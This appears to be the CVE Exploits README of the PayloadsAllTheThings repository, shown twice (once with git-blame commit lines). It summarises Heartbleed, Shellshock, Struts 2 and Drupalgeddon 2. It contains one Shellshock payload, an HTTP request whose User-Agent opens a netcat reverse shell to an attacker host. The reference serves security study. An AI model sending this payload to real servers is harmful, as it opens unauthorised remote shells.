PayloadsAllTheThings/CVE Exploits/README.md

# Common Vulnerabilities and Exposures

Big CVEs in the last 5 years.

## CVE-2014-0160 - Heartbleed

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

## CVE-2014-6271 - Shellshock

Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

```bash
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
```

## CVE-2017-5638 - Apache Struts 2

On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.

## CVE-2018-7600 - Drupalgeddon 2

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.

## Thanks to

* [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
CVE Heartbleed and Shellshcok added 2016-10-20 02:54:29 +00:00			`# Common Vulnerabilities and Exposures`
Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00
CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated 2017-06-05 12:57:28 +00:00			`Big CVEs in the last 5 years.`
CVE Heartbleed and Shellshcok added 2016-10-20 02:54:29 +00:00
CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated 2017-06-05 12:57:28 +00:00			`## CVE-2014-0160 - Heartbleed`
Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00
CVE Heartbleed and Shellshcok added 2016-10-20 02:54:29 +00:00			`The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).`

CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated 2017-06-05 12:57:28 +00:00			`## CVE-2014-6271 - Shellshock`
Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00
CVE Heartbleed and Shellshcok added 2016-10-20 02:54:29 +00:00			`Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.`

Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00			```bash
			`echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n`
			```

CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated 2017-06-05 12:57:28 +00:00			`## CVE-2017-5638 - Apache Struts 2`
Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00
CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated 2017-06-05 12:57:28 +00:00			`On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.`
CVE Heartbleed and Shellshcok added 2016-10-20 02:54:29 +00:00
Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00			`## CVE-2018-7600 - Drupalgeddon 2`

			`A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.`

CVE Heartbleed and Shellshcok added 2016-10-20 02:54:29 +00:00			`## Thanks to`
Attacks details + Summary JWT + XXE adjustments 2018-11-25 23:25:06 +00:00
			`* [Heartbleed - Official website](http://heartbleed.com)`
			`* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))`
CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated 2017-06-05 12:57:28 +00:00			`* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)`